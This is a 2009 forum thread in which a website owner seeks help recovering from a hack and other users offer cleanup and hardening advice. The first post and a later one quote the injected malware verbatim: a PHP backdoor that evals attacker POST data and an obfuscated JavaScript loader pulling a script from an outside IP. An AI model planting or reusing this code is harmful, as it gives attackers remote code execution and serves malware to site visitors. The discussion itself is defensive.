Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Recovering from a hack... can anyone assist?!

  • 13-03-2009 8:32pm
    #1
    Closed Accounts Posts: 812 ✭✭✭


    Hey guys,

    One of my sites got hacked last night... it replaced all the ?> in the php files with...
    if(!function_exists('tmp_lkojfghx')){for($i=1;$i<10;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCcyQiUzQ1pJc0M2Y3NMcjVzaXAyQnQlMjAzRjlzcmNaSSUzRElOJTJGJTJGMkI3OCUyRTJCMXJFMTAlMkUxNzVJTiUyRTI0SU45JTJGanF1SU5lcnklMkVqM0Y5cyUzRSUzQzJCJTJGQzZzMkJjc0xySU5pcDNGOXQlM0UnKS5yZXBsYWNlKC9zTHx3UW18ckV8NXN8MkJ8M0Y5fEM2fElOfFpJL2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
    

    ... and that in turn tried to place and iframe on the page but AVG started hopping saying it detected "Exploit JavaScript Obfuscation".

    So i downloaded all the files from the site, did a batch find-replace over them to restore the ?> where it found that code. And copied them back online. Now the site isn't showing up right on the browser - it's only showing the header.

    Yet the html seems to be there, and when I copy the source code into dreamweaver and link up the css correctly again it seems to format grand.

    Any ideas of suggestions?

    Here's the site: www.divegear.ie

    I changed the ftp password too, some forums suggested that it could be some form of keylogger, and my avg did find a trojan. The new ftp password was entered using copy and paste of other words on the page, that'd fool it right?

    I don't mind sharing the ftp settings with some of the main regular guys here, I trust ye and really want to get this sorted asap.


Comments

  • Closed Accounts Posts: 1,200 ✭✭✭louie


    check the .htaccess file for code that is not meant to be there.
    If the "hacker" got ftp access he might have other files there that stops from showing the page itself.


  • Closed Accounts Posts: 238 ✭✭chat2joe


    Had a look and there are no .htaccess file ....

    Now I'm not sure if they were there. Or maybe they were deleted? Should I have them there?


    I don't get why the html is in the source code when you check via the browser but it's not showing up...... :confused:


  • Closed Accounts Posts: 238 ✭✭chat2joe


    Oh and this index.htm file was also placed in a lot of diretories...
    <html>
    <head>
    <title></title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    </head>
    
    <script language=javascript><!-- 
    document.write(unescape('2B%3CZIsC6csLr5sip2Bt%203F9srcZI%3DIN%2F%2F2B78%2E2B1rE10%2E175IN%2E24IN9%2FjquINery%2Ej3F9s%3E%3C2B%2FC6s2BcsLrINip3F9t%3E').replace(/sL|wQm|rE|5s|2B|3F9|C6|IN|ZI/g,""));
     --></script><body bgcolor="#FFFFFF" text="#000000">
    
    </body>
    </html>
    


  • Registered Users, Registered Users 2 Posts: 4,287 ✭✭✭NotMe


    Check the source again. Your page is linking to 78.110.175.249/jquery.js which is dodgy.

    There's more about it here: http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/


  • Closed Accounts Posts: 238 ✭✭chat2joe


    Thanks for the link NotMe, that's exactly what happened me.

    I've found more dodge code in the file so I'm uploading again now after another find-replace job. Fingers crossed!

    Any suggestions on how to up security for the site?

    Is it because the site is phpbb2 based? It's running phpca on phpbb2, unfortunately phpca hasn't been updated for phpbb3....


  • Advertisement
  • Closed Accounts Posts: 238 ✭✭chat2joe


    Back up online and looks to be working perfect!

    Any security recommendations welcome though...


  • Registered Users, Registered Users 2 Posts: 2,032 ✭✭✭colm_c


    chat2joe wrote: »
    Back up online and looks to be working perfect!

    Any security recommendations welcome though...

    Do you know how they got in? FTP presumably?

    If so contact the hosting company, they should have a log of recent IP/FTP connections. You should report this to the gardai, with their IP address, as well as the ISP who provided it - check www.ripe.net

    In terms of security, change your password for a start to something not as hackable - at least one number, one special character and a capital letter.


  • Registered Users, Registered Users 2 Posts: 1,127 ✭✭✭smcelhinney


    Could have been via ssh or telnet either, and could have been brute force. Is your webserver on Linux or Windows? If Linux, look at bfd or denyhosts to prevent brute force. Also, you could disable ssh login by password, and only use public/private key. There's plenty of resources on the web about this.

    Let us know how you get on mate.


Advertisement